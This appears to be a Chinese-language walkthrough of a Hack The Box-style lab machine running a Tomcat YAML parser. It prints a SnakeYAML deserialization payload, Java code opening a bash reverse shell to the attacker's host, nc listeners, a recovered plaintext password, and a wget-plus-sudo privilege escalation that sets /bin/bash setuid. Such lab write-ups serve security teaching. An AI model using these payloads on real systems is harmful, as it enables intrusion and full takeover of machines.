基本信息

端口扫描

22和8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV 10.10.10.227
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 13:16 CST
Nmap scan report for 10.10.10.227
Host is up (0.068s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
|   256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_  256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.38
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.12 seconds

8080

一个在线的yaml parser:

YAML

简单的搜索:

test

1
2
3
4
5
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.6:4444/"]
  ]]
]

payload

直接用github的payload改下代码:

修改src/artsploit/AwesomeScriptEngineFactory.java文件:

1
2
3
4
5
6
7
8
9
10
11
public AwesomeScriptEngineFactory() {
            String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.6/4444 0>&1"};
            String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"};
            try {
                Runtime.getRuntime().exec(cmd);
                Runtime.getRuntime().exec(jex);
                Runtime.getRuntime().exec("echo $jex");
            } catch (IOException e) {
                e.printStackTrace();
        }
    }

然后重新编译,启动server:

1
2
3
javac src/artsploit/AwesomeScriptEngineFactory.java
cd src
python -m SimpleHTTPServer 7777

exploit

监听端口,8080端口发送payload,打到tomcat用户shell:

1
2
3
4
5
6
7
8
9
# payload
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.6:7777/"]
  ]]
]

# reverse shell 
nc -lvvp 4444

tomcat to admin

tomcat配置文件里得到admin用户密码:

1
admin : whythereisalimit

user flag

admin可以直接ssh登录,得到user.txt:

提权信息

sudo -l

查看sudo发现可以无密码运行一个go文件:

查看代码发现是检查当前目录main.wasm中info值是否为1,为1则运行当前目录deply.sh文件,wasm文件也下载下来分析:

1
2
nc 10.10.14.6 4444 < main.wasm
nc -lvvp 4444 > main.wasm

wasm

在线网站上传wasm文件解析:

发现info设置的0,修改为1后在这里编译下载:

index.go

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
package main

import (
	"fmt"
	wasm "github.com/wasmerio/wasmer-go/wasmer"
	"os/exec"
	"log"
)


func main() {
	bytes, _ := wasm.ReadBytes("main.wasm")

	instance, _ := wasm.NewInstance(bytes)
	defer instance.Close()
	init := instance.Exports["info"]
	result,_ := init()
	f := result.String()
	if (f != "1") {
		fmt.Println("Not ready to deploy")
	} else {
		fmt.Println("Ready to deploy")
		out, err := exec.Command("/bin/sh", "deploy.sh").Output()
		if err != nil {
			log.Fatal(err)
		}
		fmt.Println(string(out))
	}
}

提权 && root flag

然后就是在一个可写目录里准备好修改后的main.wasm和deply.sh文件,运行命令,可以简单的直接给bash suid(做完记得改回来,别影响其他人):

1
2
3
4
wget http://10.10.14.6:7777/test.wasm -O main.wasm
echo "chmod +s /bin/bash" > deploy.sh
chmod 777 *
sudo -u root /usr/bin/go run /opt/wasm-functions/index.go

参考资料